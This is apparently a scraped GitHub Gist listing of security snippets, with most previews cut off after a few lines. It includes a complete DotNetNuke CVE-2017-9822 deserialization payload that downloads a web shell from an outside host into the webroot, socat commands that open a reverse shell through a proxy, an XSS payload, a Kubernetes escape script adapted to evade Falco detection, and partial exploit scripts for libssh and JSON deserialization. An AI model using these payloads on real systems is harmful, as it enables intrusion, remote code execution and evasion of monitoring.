Bootstrap < 3.4.1 || < 4.3.1
✔️ CSP strict-dynamic bypass
➖ Requires user interaction
➖ Requires $('[data-toggle="tooltip"]').tooltip();
pnig0s pnigos
yassineaboukir
/ List of API endpoints & objects
Last active
December 12, 2025 15:21
A list of 3203 common API endpoints and objects designed for fuzzing.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0 | |
| 00 | |
| 01 | |
| 02 | |
| 03 | |
| 1 | |
| 1.0 | |
| 10 | |
| 100 | |
| 1000 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| # Credit: https://twitter.com/_fel1x | |
| # poc: https://twitter.com/_fel1x/status/1151487051986087936 | |
| # Adapted to GKE/kube-proxy by: https://twitter.com/bradgeesaman | |
| # and to avoid detection by Falco's default rules | |
| read -r -d '' ESCAPE <<'EOF' | |
| #!/bin/sh |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
pnigos
/ testest
Created
January 19, 2019 05:22
— forked from bearerai/testest
http://g.com/#'"/onmouseover="prompt(1)"/x=
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| http://g.com/#'"/onmouseover="prompt(1)"/x= |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import requests | |
| import sys | |
| from bs4 import BeautifulSoup | |
| from urllib.parse import urljoin | |
| import random | |
| import logging | |
| import time |
GlitchWitch
/ DotNetNuke CVE-2017-9822 PoC
Created
October 29, 2018 21:04
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| DNNPersonalization=<profile><item key="name1:key1" type="System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils], [System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ExpandedElement/><ProjectedProperty0><MethodName>PullFile</MethodName><MethodParameters><anyType xsi:type="xsd:string">http://ctf.pwntester.com/shell.aspx</anyType><anyType xsi:type="xsd:string">C:\inetpub\wwwroot\dotnetnuke\shell.aspx</anyType></MethodParameters><ObjectInstance xsi:type="FileSystemUtils"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>;language=en-us |
mlosapio
/ CVE-2018-10933-test
Last active
February 3, 2024 18:50
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # Based on https://www.openwall.com/lists/oss-security/2018/08/16/1 | |
| # untested CVE-2018-10933 | |
| import sys, paramiko | |
| import logging | |
| username = sys.argv[1] | |
| hostname = sys.argv[2] | |
| command = sys.argv[3] |
staaldraad
/ socat through proxy
Last active
December 16, 2024 17:21
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Listener on x.x.x.x:443: | |
| socat file:`tty`,raw,echo=0 tcp-listen:443 | |
| # Reverse shell proxy server is at 10.10.10.1:8222: | |
| socat UNIX-LISTEN:/tmp/x,reuseaddr,fork PROXY:10.10.10.1:x.x.x.x:443,proxyport=8222 & | |
| socat exec:'bash -li',pty,stderr,setsid,sigint,sane unix:"/tmp/x" |
topolik
/ json-deserialization-ldap.sh
Created
August 17, 2018 20:49
Backend script based on @pwntester JSON deserialization research
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| echo "Starting Apache DS using docker @ ldap://localhost:10389" | |
| docker run --name json-deser-ldap -d -p 10389:10389 greggigon/apacheds | |
| echo "... waiting 20 seconds to start Apache DS" | |
| sleep 20 | |
| # password: secret, if used with LDAP login | |
| (cat <<"EOF" |